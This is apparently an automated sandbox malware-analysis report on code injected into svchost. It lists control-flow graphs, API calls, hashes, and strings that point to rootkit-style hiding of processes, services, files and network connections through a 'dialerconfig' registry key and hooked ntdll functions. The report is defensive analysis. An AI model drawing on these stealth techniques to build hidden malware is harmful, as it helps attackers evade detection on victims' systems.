                                            • Instruction Fuzzy Hash: 18115B74F106018BFB22D721A84FB6A32DCA756F46F4D00259A0BBB594EF3DC04C8282

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 000002A661301650: GetProcessHeap.KERNEL32 ref: 000002A66130165B
                                              • Part of subcall function 000002A661301650: HeapAlloc.KERNEL32 ref: 000002A66130166A
                                              • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DA
                                              • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A661301707
                                              • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301721
                                              • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A661301741
                                              • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A66130175C
                                              • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A66130177C
                                              • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301797
                                              • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017B7
                                              • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A6613017D2
                                              • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017F2
                                            • Sleep.KERNEL32 ref: 000002A661301C43
                                            • SleepEx.KERNELBASE ref: 000002A661301C49
                                              • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A66130180D
                                              • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A66130182D
                                              • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301848
                                              • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A661301868
                                              • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301883
                                              • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613018A3
                                              • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A6613018BE
                                              • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A6613018C8
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                            • String ID:
                                            • API String ID: 1534210851-0
                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction ID: 00c3e32f535f1a666752326b103c4686352be0cf57cb2c7f26f20961d7c6380f
                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction Fuzzy Hash: FB31F075B0060193FB51AF26E94D36A62FDAB46FDAF0C4021DE0BA76D5DF1CC45882D2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 57 2a661303930-2a66130393b 58 2a66130393d-2a661303950 StrCmpNIW 57->58 59 2a661303955-2a66130395c 57->59 58->59 60 2a661303952 58->60 60->59
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: dialer
                                            • API String ID: 0-3528709123
                                            • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                            • Instruction ID: 7fe97d79589782e628872070bc3fa000d6e2a9929ce407a7fd10b9c94f4c1939
                                            • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                            • Instruction Fuzzy Hash: B5D05E20B1124A8BEB14DFA1888E76033A8AB06B15F4C80208A0213114DF1C898DC711

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: bfb7080cd5f30ec63c7e1aa02e3938f4a0833d0643ea63299f78d611e02fc58c
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: FD61FDA2F0165187EA68CF29D44876CB39DFF06FA4F588021DA1907785EF3CE896C706

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 207 2a661302cdc-2a661302d55 call 2a66131ecc0 210 2a661302d5b-2a661302d61 207->210 211 2a661303090-2a6613030b3 207->211 210->211 212 2a661302d67-2a661302d6a 210->212 212->211 213 2a661302d70-2a661302d73 212->213 213->211 214 2a661302d79-2a661302d89 GetModuleHandleA 213->214 215 2a661302d8b-2a661302d9b call 2a661313090 214->215 216 2a661302d9d 214->216 217 2a661302da0-2a661302dbe 215->217 216->217 217->211 221 2a661302dc4-2a661302de3 StrCmpNIW 217->221 221->211 222 2a661302de9-2a661302ded 221->222 222->211 223 2a661302df3-2a661302dfd 222->223 223->211 224 2a661302e03-2a661302e0a 223->224 224->211 225 2a661302e10-2a661302e23 224->225 226 2a661302e33 225->226 227 2a661302e25-2a661302e31 225->227 228 2a661302e36-2a661302e3a 226->228 227->228 229 2a661302e4a 228->229 230 2a661302e3c-2a661302e48 228->230 231 2a661302e4d-2a661302e57 229->231 230->231 232 2a661302f4d-2a661302f51 231->232 233 2a661302e5d-2a661302e60 231->233 236 2a661302f57-2a661302f5a 232->236 237 2a661303082-2a66130308a 232->237 234 2a661302e72-2a661302e7c 233->234 235 2a661302e62-2a661302e6f call 2a661301a14 233->235 239 2a661302e7e-2a661302e8b 234->239 240 2a661302eb0-2a661302eba 234->240 235->234 241 2a661302f6b-2a661302f75 236->241 242 2a661302f5c-2a661302f68 call 2a661301a14 236->242 237->211 237->225 239->240 246 2a661302e8d-2a661302e9a 239->246 247 2a661302eea-2a661302eed 240->247 248 2a661302ebc-2a661302ec9 240->248 243 2a661302f77-2a661302f84 241->243 244 2a661302fa5-2a661302fa8 241->244 242->241 243->244 250 2a661302f86-2a661302f93 243->250 251 2a661302faa-2a661302fb3 call 2a661301d28 244->251 252 2a661302fb5-2a661302fc2 lstrlenW 244->252 253 2a661302e9d-2a661302ea3 246->253 255 2a661302efb-2a661302f08 lstrlenW 247->255 256 2a661302eef-2a661302ef9 call 2a661301d28 247->256 248->247 254 2a661302ecb-2a661302ed8 248->254 258 2a661302f96-2a661302f9c 250->258 251->252 269 2a661302ffa-2a661303005 251->269 264 2a661302fc4-2a661302fce 252->264 265 2a661302fe5-2a661302fef call 2a661303930 252->265 262 2a661302ea9-2a661302eae 253->262 263 2a661302f43-2a661302f48 253->263 266 2a661302edb-2a661302ee1 254->266 259 2a661302f0a-2a661302f14 255->259 260 2a661302f2b-2a661302f3d call 2a661303930 255->260 256->255 256->263 258->269 270 2a661302f9e-2a661302fa3 258->270 259->260 271 2a661302f16-2a661302f29 call 2a661301554 259->271 260->263 274 2a661302ff2-2a661302ff4 260->274 262->240 262->253 263->274 264->265 275 2a661302fd0-2a661302fe3 call 2a661301554 264->275 265->274 266->263 276 2a661302ee3-2a661302ee8 266->276 278 2a661303007-2a66130300b 269->278 279 2a66130307c-2a661303080 269->279 270->244 270->258 271->260 271->263 274->237 274->269 275->265 275->269 276->247 276->266 284 2a66130300d-2a661303011 278->284 285 2a661303013-2a66130302d call 2a6613086a0 278->285 279->237 284->285 288 2a661303030-2a661303033 284->288 285->288 291 2a661303056-2a661303059 288->291 292 2a661303035-2a661303053 call 2a6613086a0 288->292 291->279 294 2a66130305b-2a661303079 call 2a6613086a0 291->294 292->291 294->279
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: 23cd8f04e71538b5eb9847158c47a201b9a4386d364ecdc48b455eb11579518a
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: B2B18D22B11A5087EB55CF25D54C7A963E8FB46F86F58501AEE0B63B94DF39CC88C381

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: a5cba665a44c7c07cf1dccde805d8f3e79610c362df98632861a869d0ed45d4e
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 1F315D72705B8096EB60DF60E8483ED73A8F785B54F48442ADA8E57B98EF38C54CC710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction ID: d8417c2ec523aaff61b500a3c85146917342d7b6945cdc37d9ed16cda4c36ab7
                                            • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction Fuzzy Hash: 29319136704F8086DB20CF25E84939E73A8F78ABA4F580116EA9E57B58DF3CC549CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: 4b748053efe2aa4dd715676edb3458f9a06d083db582eb8aa2e1b11a5c0e5f8f
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: D0E1E032B04A808BE700CF64D48D2DE7BB5F346B98F584516DE4AA7B99DF38C42AC741

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: 500288821ed10b0b1a9fdc2d981699a51519602a79c13b7e50a4a9ec7bc15a24
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: 2971F576B10A5086EB10DF65E88D69937F8FB8AF9DF081121DA4F67A28DF38C549C341

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: df57f9b9fcc86950589ce138aa7a0377636607729903278f6d4bc0027d70b6ca
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: F9515972B14B4493EB14DB62E54D39AB7B9F78AF94F088124DA8A17B24DF3CC059C741

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: e83984e6cd47dee7b92e0930eaa5e7c94e4c88081b7f63715ee1e9d06479c404
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: C231C569B00A4AA3FA09EB65ED5E6D53379A746F46F8C5423D40B335719F3C828DC382

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: 132fcfba970474944b12d8b7567ee438171c688ab5bdda6d84782a329f9c713f
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: D8213C36B14A4083FB10CB25E54D35A77A4F38AFA5F584215EA5A13AA8CF3CC14DCB42

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: 5125639fb1c4ff0c7cbb5d2a65fe4d13d97550c52107701ede0c85e5c89c4d54
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction Fuzzy Hash: 94419173614B8097E764CF51E44839AB7B5F389B99F048125DB8A17B54DF3CC168CB40

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 322 2a6612d69f0-2a6612d69f6 323 2a6612d6a31-2a6612d6a3b 322->323 324 2a6612d69f8-2a6612d69fb 322->324 325 2a6612d6b58-2a6612d6b6d 323->325 326 2a6612d6a25-2a6612d6a64 call 2a6612d70a0 324->326 327 2a6612d69fd-2a6612d6a00 324->327 331 2a6612d6b6f 325->331 332 2a6612d6b7c-2a6612d6b96 call 2a6612d6f34 325->332 345 2a6612d6b32 326->345 346 2a6612d6a6a-2a6612d6a7f call 2a6612d6f34 326->346 329 2a6612d6a02-2a6612d6a05 327->329 330 2a6612d6a18 __scrt_dllmain_crt_thread_attach 327->330 336 2a6612d6a11-2a6612d6a16 call 2a6612d6fe4 329->336 337 2a6612d6a07-2a6612d6a10 329->337 334 2a6612d6a1d-2a6612d6a24 330->334 338 2a6612d6b71-2a6612d6b7b 331->338 343 2a6612d6bcf-2a6612d6c00 call 2a6612d7270 332->343 344 2a6612d6b98-2a6612d6bcd call 2a6612d705c call 2a6612d6efc call 2a6612d73f8 call 2a6612d7210 call 2a6612d7234 call 2a6612d708c 332->344 336->334 354 2a6612d6c02-2a6612d6c08 343->354 355 2a6612d6c11-2a6612d6c17 343->355 344->338 349 2a6612d6b34-2a6612d6b49 345->349 357 2a6612d6a85-2a6612d6a96 call 2a6612d6fa4 346->357 358 2a6612d6b4a-2a6612d6b57 call 2a6612d7270 346->358 354->355 359 2a6612d6c0a-2a6612d6c0c 354->359 360 2a6612d6c5e-2a6612d6c74 call 2a6612d2858 355->360 361 2a6612d6c19-2a6612d6c23 355->361 375 2a6612d6ae7-2a6612d6af1 call 2a6612d7210 357->375 376 2a6612d6a98-2a6612d6abc call 2a6612d73bc call 2a6612d6eec call 2a6612d6f18 call 2a6612d90dc 357->376 358->325 365 2a6612d6cff-2a6612d6d0c 359->365 378 2a6612d6cac-2a6612d6cae 360->378 379 2a6612d6c76-2a6612d6c78 360->379 366 2a6612d6c25-2a6612d6c2d 361->366 367 2a6612d6c2f-2a6612d6c3d call 2a6612e2758 361->367 372 2a6612d6c43-2a6612d6c58 call 2a6612d69f0 366->372 367->372 389 2a6612d6cf5-2a6612d6cfd 367->389 372->360 372->389 375->345 398 2a6612d6af3-2a6612d6aff call 2a6612d7260 375->398 376->375 425 2a6612d6abe-2a6612d6ac5 __scrt_dllmain_after_initialize_c 376->425 387 2a6612d6cb5-2a6612d6cca call 2a6612d69f0 378->387 388 2a6612d6cb0-2a6612d6cb3 378->388 379->378 386 2a6612d6c7a-2a6612d6c9c call 2a6612d2858 call 2a6612d6b58 379->386 386->378 419 2a6612d6c9e-2a6612d6ca6 call 2a6612e2758 386->419 387->389 407 2a6612d6ccc-2a6612d6cd6 387->407 388->387 388->389 389->365 409 2a6612d6b25-2a6612d6b30 398->409 410 2a6612d6b01-2a6612d6b0b call 2a6612d7178 398->410 413 2a6612d6ce1-2a6612d6cf1 call 2a6612e2758 407->413 414 2a6612d6cd8-2a6612d6cdf 407->414 409->349 410->409 424 2a6612d6b0d-2a6612d6b1b 410->424 413->389 414->389 419->378 424->409 425->375 426 2a6612d6ac7-2a6612d6ae4 call 2a6612d9078 425->426 426->375
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: fbc1adb9c41e37bcc120c75772abb7ef734b56d2905b7fa5b335fbd78ce71589
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: AC818961F006C18BFA64AB66D48D399769CAF87F80F4C8025EA4943696DF3CC9CD8302

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 429 2a6613075f0-2a6613075f6 430 2a6613075f8-2a6613075fb 429->430 431 2a661307631-2a66130763b 429->431 432 2a6613075fd-2a661307600 430->432 433 2a661307625-2a661307664 call 2a661307ca0 430->433 434 2a661307758-2a66130776d 431->434 435 2a661307618 __scrt_dllmain_crt_thread_attach 432->435 436 2a661307602-2a661307605 432->436 452 2a66130766a-2a66130767f call 2a661307b34 433->452 453 2a661307732 433->453 437 2a66130777c-2a661307796 call 2a661307b34 434->437 438 2a66130776f 434->438 444 2a66130761d-2a661307624 435->444 440 2a661307607-2a661307610 436->440 441 2a661307611-2a661307616 call 2a661307be4 436->441 450 2a661307798-2a6613077cd call 2a661307c5c call 2a661307afc call 2a661307ff8 call 2a661307e10 call 2a661307e34 call 2a661307c8c 437->450 451 2a6613077cf-2a661307800 call 2a661307e70 437->451 442 2a661307771-2a66130777b 438->442 441->444 450->442 463 2a661307811-2a661307817 451->463 464 2a661307802-2a661307808 451->464 461 2a66130774a-2a661307757 call 2a661307e70 452->461 462 2a661307685-2a661307696 call 2a661307ba4 452->462 456 2a661307734-2a661307749 453->456 461->434 479 2a6613076e7-2a6613076f1 call 2a661307e10 462->479 480 2a661307698-2a6613076bc call 2a661307fbc call 2a661307aec call 2a661307b18 call 2a661309cdc 462->480 469 2a661307819-2a661307823 463->469 470 2a66130785e-2a661307874 call 2a661303458 463->470 464->463 468 2a66130780a-2a66130780c 464->468 475 2a6613078ff-2a66130790c 468->475 476 2a66130782f-2a66130783d call 2a661313358 469->476 477 2a661307825-2a66130782d 469->477 488 2a661307876-2a661307878 470->488 489 2a6613078ac-2a6613078ae 470->489 482 2a661307843-2a661307858 call 2a6613075f0 476->482 492 2a6613078f5-2a6613078fd 476->492 477->482 479->453 502 2a6613076f3-2a6613076ff call 2a661307e60 479->502 480->479 532 2a6613076be-2a6613076c5 __scrt_dllmain_after_initialize_c 480->532 482->470 482->492 488->489 497 2a66130787a-2a66130789c call 2a661303458 call 2a661307758 488->497 498 2a6613078b0-2a6613078b3 489->498 499 2a6613078b5-2a6613078ca call 2a6613075f0 489->499 492->475 497->489 526 2a66130789e-2a6613078a6 call 2a661313358 497->526 498->492 498->499 499->492 512 2a6613078cc-2a6613078d6 499->512 519 2a661307701-2a66130770b call 2a661307d78 502->519 520 2a661307725-2a661307730 502->520 517 2a6613078d8-2a6613078df 512->517 518 2a6613078e1-2a6613078f1 call 2a661313358 512->518 517->492 518->492 519->520 531 2a66130770d-2a66130771b 519->531 520->456 526->489 531->520 532->479 533 2a6613076c7-2a6613076e4 call 2a661309c78 532->533 533->479
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 7ddb7ff4f809c3db95e285fe4209e61c8d899d6b3a3ce55c37dc94c9d2a4d2eb
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 8181E021F0064587FA50EB29984E3A926DCAB47F92F0C44159A8B77792DF3CC94EC792

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 536 2a661309804-2a661309842 537 2a661309848-2a66130984b 536->537 538 2a661309933 536->538 539 2a661309851 537->539 540 2a661309935-2a661309951 537->540 538->540 541 2a661309854 539->541 542 2a66130985a-2a661309869 541->542 543 2a66130992b 541->543 544 2a661309876-2a661309895 LoadLibraryExW 542->544 545 2a66130986b-2a66130986e 542->545 543->538 548 2a661309897-2a6613098a0 call 2a661313080 544->548 549 2a6613098ed-2a661309902 544->549 546 2a66130990d-2a66130991c call 2a661313090 545->546 547 2a661309874 545->547 546->543 558 2a66130991e-2a661309929 546->558 552 2a6613098e1-2a6613098e8 547->552 556 2a6613098cf-2a6613098d9 548->556 557 2a6613098a2-2a6613098b7 call 2a66130ad28 548->557 549->546 550 2a661309904-2a661309907 FreeLibrary 549->550 550->546 552->541 556->552 557->556 561 2a6613098b9-2a6613098cd LoadLibraryExW 557->561 558->540 561->549 561->556
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: 9bd910482f45c5d8184c8c718260f1b040edf69a8f8e68ff72a2fb9d4db38604
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: 21318F31B12A5196EE11DF02A80C79967D8BB4AFA1F1E4525ED2F6B390DF3CC54D8342

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: ead090be0ed3a0cdea6c2fc4ee05aebdc710564f3f58afb868419e84163d7b64
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: 03118B31B14B5087E7508B52E84E31972B8F39AFE4F084224EA5B97798CF3CC9088741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction ID: ef55fef685f6e63ea46eb99b583f4df4a61f4aad81c91252b5b54e42dce67506
                                            • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction Fuzzy Hash: B4D1C876608B8882EA70DB0AE49C35A77E4F389F85F140216EACE57BA5CF3CC545CB41
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: 7c7cd99321ed215743737de429bd94f26eb07e2b3972f15d08d9bfc67b5388df
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: 9431A221B01B5197EB19EF16A80D66977F8FB4AF95F0C4020DE4A27B54EF3CC4A98781
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
